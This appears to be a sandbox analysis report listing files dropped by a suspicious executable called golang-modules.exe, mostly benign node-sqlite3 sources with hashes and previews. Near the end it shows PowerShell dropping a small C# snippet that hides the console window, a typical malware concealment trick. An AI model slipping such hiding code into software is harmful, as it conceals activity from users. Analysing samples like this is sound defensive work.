                                  Preview:{. 'includes': [ 'common-sqlite.gypi' ],.. 'variables': {. 'sqlite_magic%': '',. },.. 'target_defaults': {. 'default_configuration': 'Release',. 'cflags':[. '-std=c99'. ],. 'configurations': {. 'Debug': {. 'defines': [ 'DEBUG', '_DEBUG' ],. 'msvs_settings': {. 'VCCLCompilerTool': {. 'RuntimeLibrary': 1, # static debug. },. },. },. 'Release': {. 'defines': [ 'NDEBUG' ],. 'msvs_settings': {. 'VCCLCompilerTool': {. 'RuntimeLibrary': 0, # static release. },. },. }. },. 'msvs_settings': {. 'VCCLCompilerTool': {. },. 'VCLibrarianTool': {. },. 'VCLinkerTool': {. 'GenerateDebugInformation': 'true',. },. },. 'conditions': [. ['OS == "win"', {. 'defines': [. 'WIN32'. ],. }]. ],. },.. 'targets': [. {. 'target_name': 'action_before_build',. 'type': 'none',.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):59
                                  Entropy (8bit):4.439231872095227
                                  Encrypted:false
                                  SSDEEP:3:3BBBbJvHEb9UJMRzL+BMev:xBBdHWDRnA
                                  MD5:8582B2DCAED9C5A6F3B7CFE150545254
                                  SHA1:14667874E0BFBE4FFC951F3E4BEC7C5CF44E5A81
                                  SHA-256:762C7A74D7F92860A3873487B68E89F654A21D2AAEAE9524EAB5DE9C65E66A9C
                                  SHA-512:22EC4DF7697322B23AE2E73C692ED5C925D50FDE2B7E72BFC2D5DD873E2DA51834B920DEA7C67CCA5733E8A3F5E603805762E8BE238C651AA40290452843411D
                                  Malicious:false
                                  Preview:module.exports = require('bindings')('node_sqlite3.node');.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:Java source, ASCII text
                                  Category:dropped
                                  Size (bytes):7163
                                  Entropy (8bit):5.138163315307549
                                  Encrypted:false
                                  SSDEEP:192:UIxYINTr7I/rsKlMkZ/YNpApVYP/pVPHztXpepCrilvt6wqofIoGoQscFsMR:UyYuSgPTK6wqkNsR
                                  MD5:EF8EF3BD8E4332D3FC264F0ADF877B8D
                                  SHA1:7E4D52F5E397ED1D51DCCED24ACE9A5E00F91500
                                  SHA-256:A39DB87A3A3AA954AC3F6553B9FBFC642EB22BEF7586CC1F0559E676AA073FA8
                                  SHA-512:5E456EE839F988FED95F816278A3DA6998C8757403B98351C4BC26CA197146747B7A20E0C1A702818053547C4D9F9BCF9607BB778C88CA7CF22F21D9C9B4B091
                                  Malicious:false
                                  Preview:// Type definitions for sqlite3.// Project: http://github.com/tryghost/node-sqlite3../// <reference types="node" />..import events = require("events");..export const OPEN_READONLY: number;.export const OPEN_READWRITE: number;.export const OPEN_CREATE: number;.export const OPEN_FULLMUTEX: number;.export const OPEN_SHAREDCACHE: number;.export const OPEN_PRIVATECACHE: number;.export const OPEN_URI: number;..export const VERSION: string;.export const SOURCE_ID: string;.export const VERSION_NUMBER: number;..export const OK: number;.export const ERROR: number;.export const INTERNAL: number;.export const PERM: number;.export const ABORT: number;.export const BUSY: number;.export const LOCKED: number;.export const NOMEM: number;.export const READONLY: number;.export const INTERRUPT: number.export const IOERR: number;.export const CORRUPT: number.export const NOTFOUND: number;.export const FULL: number;.export const CANTOPEN: number;.export const PROTOCOL: number;.export const EMPTY: number;.ex
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):6365
                                  Entropy (8bit):4.5893883775756406
                                  Encrypted:false
                                  SSDEEP:192:QoM2Wd0WmO6pM+tPtVRhoh3hG/h1goWPQfAcCy7gPQbQwZQiR893+9dY:npM0I6aPkd/K
                                  MD5:275019A4199A84CFD18ABD0F1AE497AA
                                  SHA1:8601683F9B6206E525E4A087A7CCA40D07828FD8
                                  SHA-256:8D6B400AE7F69A80D0CDD37A968D7B9A913661FA53475E5B8DE49DDA21684973
                                  SHA-512:6422249CCD710973F15D1242A8156D98FA8BDEA820012DF669E5363C50C5D8492D21FFEFCDFA05B46C3C18033DDE30F03349E880A4943FEDA8D1EE3C00F952B0
                                  Malicious:false
                                  Preview:const path = require('path');.const sqlite3 = require('./sqlite3-binding.js');.const EventEmitter = require('events').EventEmitter;.module.exports = exports = sqlite3;..function normalizeMethod (fn) {. return function (sql) {. let errBack;. const args = Array.prototype.slice.call(arguments, 1);.. if (typeof args[args.length - 1] === 'function') {. const callback = args[args.length - 1];. errBack = function(err) {. if (err) {. callback(err);. }. };. }. const statement = new Statement(this, sql, errBack);. return fn.call(this, statement, args);. };.}..function inherits(target, source) {. for (const k in source.prototype). target.prototype[k] = source.prototype[k];.}..sqlite3.cached = {. Database: function(file, a, b) {. if (file === '' || file === ':memory:') {. // Don't cache special databases.. return new Database(fi
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):1357
                                  Entropy (8bit):4.369532219363835
                                  Encrypted:false
                                  SSDEEP:24:aXbwFF8Sg5eV71awdNDm+vl0dU6LNS0Gl9INNAO+BIynqRiMqUc0Zz:Sbw4SiS17dN7d0LLUfI0OWIynqRiMqUr
                                  MD5:E5C2DE3C74BC66D4906BB34591859A5F
                                  SHA1:37EC527D9798D43898108080506126B4146334E7
                                  SHA-256:D06CAEC6136120C6FB7EE3681B1CA949E8B634E747EA8D3080C90F35AEB7728F
                                  SHA-512:E250E53DAE618929CBF3CB2F1084A105D3A78BDFB6BB29E290F63A1FD5FBB5B2FAB934AD16BC285E245D749A90C84BDC72FDC1A77AF912B7356C18B0B197FBE5
                                  Malicious:false
                                  Preview:// Inspired by https://github.com/tlrobinson/long-stack-traces.const util = require('util');..function extendTrace(object, property, pos) {. const old = object[property];. object[property] = function() {. const error = new Error();. const name = object.constructor.name + '#' + property + '(' +. Array.prototype.slice.call(arguments).map(function(el) {. return util.inspect(el, false, 0);. }).join(', ') + ')';.. if (typeof pos === 'undefined') pos = -1;. if (pos < 0) pos += arguments.length;. const cb = arguments[pos];. if (typeof arguments[pos] === 'function') {. arguments[pos] = function replacement() {. const err = arguments[0];. if (err && err.stack && !err.__augmented) {. err.stack = filter(err).join('\n');. err.stack += '\n--> in ' + name;. err.stack += '\n' + filter(error).slice(1).join('\n');.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:JSON data
                                  Category:dropped
                                  Size (bytes):2189
                                  Entropy (8bit):4.910536087911446
                                  Encrypted:false
                                  SSDEEP:48:atuR+HnA7Ydf7aKCRU0dmGiW/o2Ygy3rj/cirPRpg0q:RsHnpjXixY2o2Fy3rj//rPRp0
                                  MD5:D0D759C39758174ECA4580E6A04A2C15
                                  SHA1:97366BB2FA9D63BB9660B3D130EFB6D37A6B80EF
                                  SHA-256:C782C19485B0026E209076A236484A62885CB3A0828322A2936043230ED1EC41
                                  SHA-512:B1F728883023D93EA46E72278A4DFF96BF6489E37471F8804BD7D6C52F21B7EE284803CEC589C941701A590458671F7C53D63F0F75500843EE25D8D4E60629D0
                                  Malicious:false
                                  Preview:{. "name": "sqlite3",. "description": "Asynchronous, non-blocking SQLite3 bindings",. "version": "5.1.7",. "homepage": "https://github.com/TryGhost/node-sqlite3",. "author": {. "name": "Mapbox",. "url": "https://mapbox.com/". },. "binary": {. "napi_versions": [. 3,. 6. ]. },. "contributors": [. "Daniel Lockyer <hi@daniellockyer.com>",. "Konstantin K.fer <mail@kkaefer.com>",. "Dane Springmeyer <dane@mapbox.com>",. "Will White <will@mapbox.com>",. "Orlando Vazquez <ovazquez@gmail.com>",. "Artem Kustikov <kustikoff@gmail.com>",. "Eric Fredricksen <efredricksen@gmail.com>",. "John Wright <mrjjwright@gmail.com>",. "Ryan Dahl <ry@tinyclouds.org>",. "Tom MacWright <tom@mapbox.com>",. "Carter Thaxton <carter.thaxton@gmail.com>",. "Audrius Ka.ukauskas <audrius@neutrino.lt>",. "Johannes Schauer <josch@pyneo.org>",. "Nathan Rajlich <nathan@tootallnate.net>",. "AJ ONeal <coolaj86@gmail.com>",. "Mithgol",. "Ben Noor
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C++ source, ASCII text
                                  Category:dropped
                                  Size (bytes):1898
                                  Entropy (8bit):4.930561121765868
                                  Encrypted:false
                                  SSDEEP:48:hxZDjeG5pIdsijad2eLD8FlFb26iKl3/g6MeBos:hxMupLbj8FlFb26iKl3VdT
                                  MD5:E8C5E5C02D87E6AF4455FF2C59C3588B
                                  SHA1:A0DE928C621BB9A71BA9CF002E0F0726E4DB7C0E
                                  SHA-256:CCE55C56B41CB493EBD43B232FF8FFC9F5A180F5BAB2D10372ECA6780EB105F6
                                  SHA-512:ED96889E0D1D5263FB8FED7A4966905B9812C007FBB04B733CADBE84EDC7179015B9967FF5F48816FF2C97ACF4A5B4792A35CEE1F8FCE23E5FDC797F8EE0C762
                                  Malicious:false
                                  Preview:#ifndef NODE_SQLITE3_SRC_ASYNC_H.#define NODE_SQLITE3_SRC_ASYNC_H..#include <napi.h>.#include <uv.h>..#include "threading.h"..// Generic uv_async handler..template <class Item, class Parent> class Async {. typedef void (*Callback)(Parent* parent, Item* item);..protected:. uv_async_t watcher;. NODE_SQLITE3_MUTEX_t. std::vector<Item*> data;. Callback callback;.public:. Parent* parent;..public:. Async(Parent* parent_, Callback cb_). : callback(cb_), parent(parent_) {. watcher.data = this;. NODE_SQLITE3_MUTEX_INIT. uv_loop_t *loop;. napi_get_uv_event_loop(parent_->Env(), &loop);. uv_async_init(loop, &watcher, reinterpret_cast<uv_async_cb>(listener));. }.. static void listener(uv_async_t* handle) {. auto* async = static_cast<Async*>(handle->data);. std::vector<Item*> rows;. NODE_SQLITE3_MUTEX_LOCK(&async->mutex). rows.swap(async->data);. NODE_SQLITE3_MUTEX_UNLOCK(&async->mutex). fo
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C source, ASCII text
                                  Category:dropped
                                  Size (bytes):13555
                                  Entropy (8bit):5.0893763582704965
                                  Encrypted:false
                                  SSDEEP:192:uPMQUUq5MnkVw1qKQJEiyaMR00/eho92YDZLhFmW3VvGiZ+aVHiZHTQTE6KZaQiX:uPMnqvaOS1Q
                                  MD5:3E21D304AFE1783BDB88122C5563E36C
                                  SHA1:10F57A35B7D217226019DBE2278524BF3E447778
                                  SHA-256:960E50580D2F2E668EE79B0C2EF99EAF006BC9178F438C4BB4E278F80F3D8960
                                  SHA-512:A96AB73F424ABAF806CBD4C0537DC23772709753050FFAB58996435DF33E5FF1BCFEA24193B0ABBDEC1BA2E22E91D8A74CE82CB034CB6035ADE760B7D7730C33
                                  Malicious:false
                                  Preview:#include <cstring>.#include <napi.h>.#include "macros.h".#include "database.h".#include "backup.h"..using namespace node_sqlite3;..Napi::Object Backup::Init(Napi::Env env, Napi::Object exports) {. Napi::HandleScope scope(env);.. // declare napi_default_method here as it is only available in Node v14.12.0+. auto napi_default_method = static_cast<napi_property_attributes>(napi_writable | napi_configurable);.. auto t = DefineClass(env, "Backup", {. InstanceMethod("step", &Backup::Step, napi_default_method),. InstanceMethod("finish", &Backup::Finish, napi_default_method),. InstanceAccessor("idle", &Backup::IdleGetter, nullptr),. InstanceAccessor("completed", &Backup::CompletedGetter, nullptr),. InstanceAccessor("failed", &Backup::FailedGetter, nullptr),. InstanceAccessor("remaining", &Backup::RemainingGetter, nullptr),. InstanceAccessor("pageCount", &Backup::PageCountGetter, nullptr),. InstanceAccessor("retryErrors", &Back
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C++ source, ASCII text
                                  Category:dropped
                                  Size (bytes):6882
                                  Entropy (8bit):4.879154935574395
                                  Encrypted:false
                                  SSDEEP:192:jXmQS7rRLcxPsPVHXmIXYIyx15kPhw0Io:j2QS7rRLOPs5e0
                                  MD5:29DD2FCA11A4E0776C49140ECAC95CE9
                                  SHA1:837CFBC391C7FAAD304E745FC48AE9693AFAF433
                                  SHA-256:556BA9AF78010F41BC6B5B806743DC728BC181934BF8A7C6E5D606F9B8C7A2E9
                                  SHA-512:5785667B9C49D4F4320022C98E0567A412B48A790C99569261C12B8738BDE0B4949D3998E2B375540EDE2FF1D861CAD859780ADE796B71D4D1D692E1ED449021
                                  Malicious:false
                                  Preview:#ifndef NODE_SQLITE3_SRC_BACKUP_H.#define NODE_SQLITE3_SRC_BACKUP_H..#include "database.h"..#include <string>.#include <queue>.#include <set>..#include <sqlite3.h>.#include <napi.h>..using namespace Napi;..namespace node_sqlite3 {../**. *. * A class for managing an sqlite3_backup object. For consistency. * with other node-sqlite3 classes, it maintains an internal queue. * of calls.. *. * Intended usage from node:. *. * var db = new sqlite3.Database('live.db');. * var backup = db.backup('backup.db');. * .... * // in event loop, move backup forward when we have time.. * if (backup.idle) { backup.step(NPAGES); }. * if (backup.completed) { ... success ... }. * if (backup.failed) { ... sadness ... }. * // do other work in event loop - fine to modify live.db. * .... *. * Here is how sqlite's backup api is exposed:. *. * - `sqlite3_backup_init`: This is implemented as. * `db.backup(filename, [callback])` or. * `db.backup(filename, destDbName, sourceDbName, file
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C source, ASCII text
                                  Category:dropped
                                  Size (bytes):22230
                                  Entropy (8bit):5.0522303712030086
                                  Encrypted:false
                                  SSDEEP:192:JPjStDPG2moQpNrkJTdapteqh/1UpTvo2CqsaSjypFXu6WfqAG3n4lZ+53cY/5pu:JPj2Gxgav1qs1bqY
                                  MD5:D6F67F29966B29034FA0058D59A51794
                                  SHA1:E1F9F8C20B654568E65036D2928EA5DD6E3BBA6B
                                  SHA-256:40EA909433A35A95A8463C49231DDCA040717681FC96EE3BA6F10840429B4AD6
                                  SHA-512:7BEF1762CD869375B589DAC5E780406BAF7B477F14713540940CA177247943642F61C4B2084A08C808EA4F007EDE4BBC1BCF2F19425CB826EFB8B101BE445ED9
                                  Malicious:false
                                  Preview:#include <cstring>.#include <napi.h>..#include "macros.h".#include "database.h".#include "statement.h"..using namespace node_sqlite3;..#if NAPI_VERSION < 6.Napi::FunctionReference Database::constructor;.#endif..Napi::Object Database::Init(Napi::Env env, Napi::Object exports) {. Napi::HandleScope scope(env);. // declare napi_default_method here as it is only available in Node v14.12.0+. auto napi_default_method = static_cast<napi_property_attributes>(napi_writable | napi_configurable); .. auto t = DefineClass(env, "Database", {. InstanceMethod("close", &Database::Close, napi_default_method),. InstanceMethod("exec", &Database::Exec, napi_default_method),. InstanceMethod("wait", &Database::Wait, napi_default_method),. InstanceMethod("loadExtension", &Database::LoadExtension, napi_default_method),. InstanceMethod("serialize", &Database::Serialize, napi_default_method),. InstanceMethod("parallelize", &Database::Parallelize, napi_default_
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C++ source, ASCII text
                                  Category:dropped
                                  Size (bytes):5152
                                  Entropy (8bit):4.827269492024068
                                  Encrypted:false
                                  SSDEEP:96:HWEP0L0TnYvyVH0GmPnsM8plenrnxiNn5hVB4KTRDpLzysrPrWr7xaqan4qi7lgj:vPivyVHfmPjrcN5h/4KVVr43lUZtX
                                  MD5:DE31AB62B7068AEA6CFFB22B54A435BB
                                  SHA1:7FD98864C970CAA9C60CFC4CE1E77D736B5B5231
                                  SHA-256:8521F458B206ED8F9BF79E2BD869DA0A35054B4BE44D6EA8C371DB207ECCB283
                                  SHA-512:598491103564B024012DA39AC31F54CF39F10DA789CD5B17AF44E93042D9526B9FFD4867112C5F9755CB4ADA398BF5429F01DDA6C1BBC5137BEA545C3C88453B
                                  Malicious:false
                                  Preview:.#ifndef NODE_SQLITE3_SRC_DATABASE_H.#define NODE_SQLITE3_SRC_DATABASE_H...#include <assert.h>.#include <string>.#include <queue>..#include <sqlite3.h>.#include <napi.h>..#include "async.h"..using namespace Napi;..namespace node_sqlite3 {..class Database;...class Database : public Napi::ObjectWrap<Database> {.public:.#if NAPI_VERSION < 6. static Napi::FunctionReference constructor;.#endif. static Napi::Object Init(Napi::Env env, Napi::Object exports);.. static inline bool HasInstance(Napi::Value val) {. auto env = val.Env();. Napi::HandleScope scope(env);. if (!val.IsObject()) return false;. auto obj = val.As<Napi::Object>();.#if NAPI_VERSION < 6. return obj.InstanceOf(constructor.Value());.#else. auto constructor =. env.GetInstanceData<Napi::FunctionReference>();. return obj.InstanceOf(constructor->Value());.#endif. }.. struct Baton {. napi_async_work request = NULL;. Database* db;. Napi::F
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C source, ASCII text
                                  Category:dropped
                                  Size (bytes):861
                                  Entropy (8bit):5.4548154843713075
                                  Encrypted:false
                                  SSDEEP:24:qh2OetAyTMtTlzVh7bbl9lhlRlnRlhmcXQJMyWmnmhm7:getzTMtxVh7bbl9lhlRlnRlgcXQJMyWg
                                  MD5:55A9165C6720727B6EC6CB815B026DEB
                                  SHA1:E737E117BDEFA5838834F342D2C51E8009011008
                                  SHA-256:9D4264BB1DCBEF8D927BB3A1809A01B0B89D726C217CEE99EA9CCFDC7D456B6F
                                  SHA-512:79ED80377BFB576F695F271ED5200BB975F2546110267D264F0AB917F56C26ABF6D3385878285FE3E378B254AF99B59BDB8BBCAB7427788C90A0460EB2EE5B77
                                  Malicious:false
                                  Preview:// http://web.archive.org/web/20140401031018/http://rjpower9000.wordpress.com:80/2012/04/09/fun-with-shared-libraries-version-glibc_2-14-not-found/..#if defined(__linux__)..#define _GNU_SOURCE.#include <features.h>.#undef _GNU_SOURCE..#if defined(__USE_GNU)..#if defined(__x86_64__).__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");.__asm__(".symver exp,exp@GLIBC_2.2.5");.__asm__(".symver log,log@GLIBC_2.2.5");.__asm__(".symver log2,log2@GLIBC_2.2.5");.__asm__(".symver pow,pow@GLIBC_2.2.5");.__asm__(".symver fcntl64,fcntl@GLIBC_2.2.5");.#endif..#if defined(__aarch64__) || defined(_M_ARM64).__asm__(".symver memcpy,memcpy@GLIBC_2.17");.__asm__(".symver exp,exp@GLIBC_2.17");.__asm__(".symver log,log@GLIBC_2.17");.__asm__(".symver log2,log2@GLIBC_2.17");.__asm__(".symver pow,pow@GLIBC_2.17");.__asm__(".symver fcntl64,fcntl@GLIBC_2.17");.#endif..#endif.#endif.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C source, ASCII text
                                  Category:dropped
                                  Size (bytes):11168
                                  Entropy (8bit):3.8120968442523697
                                  Encrypted:false
                                  SSDEEP:192:SOxrBErYr4hnxlEPTZFkGdyrKL7h7K0d06I7SFcMWFtOj5Lk8wJfbZh720J0x7YY:95ZHdFvh+84DE5o8wJfbZhKUMFAUn
                                  MD5:B60768ED9DD86A1116E3BCC95FF9387D
                                  SHA1:C057A7EEBBA8CE61E27267930A8526AB54920AA3
                                  SHA-256:C25BE1861BD8E8457300B218F5FA0BBA734F9D1F92B47D3B6AB8EE7C1862CCBE
                                  SHA-512:84E0670128F1D8712E703B6E4B684B904A8081886C9739C63B71962E5D465AC569B16CB0DB74CB41DC015A64DCC1E3A9A20B0CF7F54D4320713CC0F49E0F7363
                                  Malicious:false
                                  Preview:#ifndef NODE_SQLITE3_SRC_MACROS_H.#define NODE_SQLITE3_SRC_MACROS_H..const char* sqlite_code_string(int code);.const char* sqlite_authorizer_string(int type);.#include <vector>..// TODO: better way to work around StringConcat?.#include <napi.h>.inline Napi::String StringConcat(Napi::Value str1, Napi::Value str2) {. return Napi::String::New(str1.Env(), str1.As<Napi::String>().Utf8Value() +. str2.As<Napi::String>().Utf8Value() );.}..// A Napi substitute IsInt32().inline bool OtherIsInt(Napi::Number source) {. double orig_val = source.DoubleValue();. double int_val = static_cast<double>(source.Int32Value());. if (orig_val == int_val) {. return true;. } else {. return false;. }.}..#define IS_FUNCTION(cb) \. !cb.IsUndefined() && cb.IsFunction()..#define REQUIRE_ARGUMENTS(n) \. if (info.Length() < (n)) { \. Napi::TypeError::New(env, "
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C source, ASCII text
                                  Category:dropped
                                  Size (bytes):6119
                                  Entropy (8bit):4.884350648884472
                                  Encrypted:false
                                  SSDEEP:96:ONYHxRe61zh7H7qmZ+OmLY3jFlOo3zDTjDNhFD/nfHw8lnT3znz/PVTTzP9pbRj7:QY7e61zh7H7qXOL3jFlOo3zDTjDNhFDd
                                  MD5:7D033E9B15E4F2230D8EF59CDE708C69
                                  SHA1:9B05C5CF3F4FC9B2C20BA46420002BB48EDCEB21
                                  SHA-256:E80FAE190ACE1A5153A397AE9FE55D6D28651471FB7BEBF9BBB5528095D70F44
                                  SHA-512:0E709A8C58B73CF6D90F99CE2E0D9F2DBD8DEFE8DC8BC8919F82AB8CE66E7B4435DACB25B919E3A75030777E6A91BEB2132653424B129F12D1169E6A28AB163C
                                  Malicious:false
                                  Preview:#include <stdint.h>.#include <sstream>.#include <cstring>.#include <string>.#include <sqlite3.h>..#include "macros.h".#include "database.h".#include "statement.h".#include "backup.h"..using namespace node_sqlite3;..namespace {..Napi::Object RegisterModule(Napi::Env env, Napi::Object exports) {. Napi::HandleScope scope(env);.. Database::Init(env, exports);. Statement::Init(env, exports);. Backup::Init(env, exports);.. exports.DefineProperties({. DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_READONLY, OPEN_READONLY). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_READWRITE, OPEN_READWRITE). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_CREATE, OPEN_CREATE). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_FULLMUTEX, OPEN_FULLMUTEX). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_URI, OPEN_URI). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_SHAREDCACHE, OPEN_SHAREDCACHE). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_PRIVATECACHE, OPEN_P
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C++ source, ASCII text
                                  Category:dropped
                                  Size (bytes):29401
                                  Entropy (8bit):4.878647788340572
                                  Encrypted:false
                                  SSDEEP:384:SPNAIMZaIcbU7Z8OIP5SF0IEz/Rc+rniYcCWOJ5ssSmM5OX6rb/4Q6f6qb5aM5vE:YvIgpcgQ6fG
                                  MD5:F4E74D3038BECB8B3093EED0192B7A27
                                  SHA1:66A845CBA7C2C478879238CC79F21DF40DD4575E
                                  SHA-256:2FE8C826256CB1B96E26C74AEAB465A329A307E7E1107BA296D059A07CC0F948
                                  SHA-512:0B3DBEC5D4A098FC551F8516CE87EB4DA292063A2F0C61D7279BC207E33D0D83A2DF9DB04EDCF58B6A0CF0914BA5B51C0E4CA38A17553DDE464B2C37BF7E38DE
                                  Malicious:false
                                  Preview:#include <cstring>.#include <napi.h>.#include <uv.h>..#include "macros.h".#include "database.h".#include "statement.h"..using namespace node_sqlite3;..Napi::Object Statement::Init(Napi::Env env, Napi::Object exports) {. Napi::HandleScope scope(env);.. // declare napi_default_method here as it is only available in Node v14.12.0+. auto napi_default_method = static_cast<napi_property_attributes>(napi_writable | napi_configurable);.. auto t = DefineClass(env, "Statement", {. InstanceMethod("bind", &Statement::Bind, napi_default_method),. InstanceMethod("get", &Statement::Get, napi_default_method),. InstanceMethod("run", &Statement::Run, napi_default_method),. InstanceMethod("all", &Statement::All, napi_default_method),. InstanceMethod("each", &Statement::Each, napi_default_method),. InstanceMethod("reset", &Statement::Reset, napi_default_method),. InstanceMethod("finalize", &Statement::Finalize_, napi_default_method),. });.. exports.Set(
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C++ source, ASCII text
                                  Category:dropped
                                  Size (bytes):6781
                                  Entropy (8bit):4.730525251915133
                                  Encrypted:false
                                  SSDEEP:192:T2kHmSF3oPvmPVD6LjmbaXCYG4hqY21nyi6BF1pcDoF/+InO:1Gw4PvmlQjRNL21+BSDt
                                  MD5:0B81C9BE1DC0FF314182399CDC301AEA
                                  SHA1:7433B86711D132A4DF826BAE80E58801A3EB74C9
                                  SHA-256:605633BA0FB1922C16AA5FBFFFED52A097F29BF31CEE7190D810C24C02DE515B
                                  SHA-512:9CF986538D048A48B9F020FC51F994F25168540DB35BDB0314744FDEC80A45BA99064BC35FE76B35918753C2886D4466FDD7E36B25838C6039F712E5AC7D81B3
                                  Malicious:false
                                  Preview:#ifndef NODE_SQLITE3_SRC_STATEMENT_H.#define NODE_SQLITE3_SRC_STATEMENT_H..#include <cstdlib>.#include <cstring>.#include <string>.#include <queue>.#include <vector>.#include <sqlite3.h>.#include <napi.h>.#include <uv.h>..#include "database.h".#include "threading.h"..using namespace Napi;..namespace node_sqlite3 {..namespace Values {. struct Field {. inline Field(unsigned short _index, unsigned short _type = SQLITE_NULL) :. type(_type), index(_index) {}. inline Field(const char* _name, unsigned short _type = SQLITE_NULL) :. type(_type), index(0), name(_name) {}.. unsigned short type;. unsigned short index;. std::string name;.. virtual ~Field() = default;. };.. struct Integer : Field {. template <class T> inline Integer(T _name, int64_t val) :. Field(_name, SQLITE_INTEGER), value(val) {}. int64_t value;. virtual ~Integer() override = default;. };.. struct Float : Field {.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C source, ASCII text
                                  Category:dropped
                                  Size (bytes):388
                                  Entropy (8bit):5.099563136480987
                                  Encrypted:false
                                  SSDEEP:6:MhkY0gUk3fg7IWy8jbg8QQ8ejbg2YmtWmbggVDDWmbgUUF9Xfg9gkv:tYB3qVyA8ej1Ym4mhDKmwm99v
                                  MD5:F2A075D3101C2BF109D94F8C65B4ECB5
                                  SHA1:D48294AEC0B7AEB03CF5D56A9912E704B9E90BF6
                                  SHA-256:E0AB4F798BCCB877548B0AB0F3D98C051B36CDE240FDF424C70ACE7DAF0FFD36
                                  SHA-512:D95B5FDA6CB93874FE577439F7BD16B10EAE37B70C45AE2BD914790C1E3BA70DFB6BDA7BE79D196F2C40837D98F1005C3ED209CAB9BA346ADA9CE2ED62A87F13
                                  Malicious:false
                                  Preview:#ifndef NODE_SQLITE3_SRC_THREADING_H.#define NODE_SQLITE3_SRC_THREADING_H..#define NODE_SQLITE3_MUTEX_t uv_mutex_t mutex;.#define NODE_SQLITE3_MUTEX_INIT uv_mutex_init(&mutex);.#define NODE_SQLITE3_MUTEX_LOCK(m) uv_mutex_lock(m);.#define NODE_SQLITE3_MUTEX_UNLOCK(m) uv_mutex_unlock(m);.#define NODE_SQLITE3_MUTEX_DESTROY uv_mutex_destroy(&mutex);..#endif // NODE_SQLITE3_SRC_THREADING_H.
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  File Type:MSVC .res
                                  Category:dropped
                                  Size (bytes):652
                                  Entropy (8bit):3.1390685059910677
                                  Encrypted:false
                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0MlGak7YnqqHMlXPN5Dlq5J:+RI+ycuZhNOeGakSHeXPNnqX
                                  MD5:F61C5A07F8627B6721900AA43E2C7F77
                                  SHA1:169012D10913FA0676A6549395261185D8126A69
                                  SHA-256:E8B04CB1B91162BC05816056D1A62802891FB3F27C505815A9D3907E2E9B197F
                                  SHA-512:674FD78BF1981C2B0D2F1C1F8850CADF63989273B41C69ABB882CFA9F764CA47F2172079908C67D35D6F3D2DC707E4099D8F0441296F24FB53CC8B176C2C7CFB
                                  Malicious:false
                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.y.5.3.v.v.k.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.y.5.3.v.v.k.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                  Category:dropped
                                  Size (bytes):426
                                  Entropy (8bit):4.903335834110758
                                  Encrypted:false
                                  SSDEEP:6:V/DsYLDS81zu+VMeyL+iVFSRaiOwsiVFSRkoSoOD28SjP/fBkrRq///cSkawKA3p:V/DTLDfugM6OwY9O2dHGq/sDuy
                                  MD5:B462A7B0998B386A2047C941506F7C1B
                                  SHA1:61E8AA007164305A51FA2F1CEBAF3F8E60A6A59F
                                  SHA-256:A81F86CD4D33EBBF2B725DF6702B8F6B3C31627BF52EB1CADC1E40B1C0C2BB35
                                  SHA-512:EB41B838CC5726F4D1601D3C68D455203D3C23F17469B3C8CBDD552F479F14829856D699F310DEC05FE7504A2AE511D0B7FFFF6B66CEADB5A225EFE3E2F3A020
                                  Malicious:false
                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace Console.{. public class Window. {. .[DllImport("Kernel32.dll")].public static extern IntPtr GetConsoleWindow();.[DllImport("user32.dll")].public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);.public static void Hide().{. IntPtr hWnd = GetConsoleWindow();. if(hWnd != IntPtr.Zero). {. ShowWindow(hWnd, 0);. }.}... }..}.
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                  Category:dropped
                                  Size (bytes):371
                                  Entropy (8bit):5.315115186045887
                                  Encrypted:false
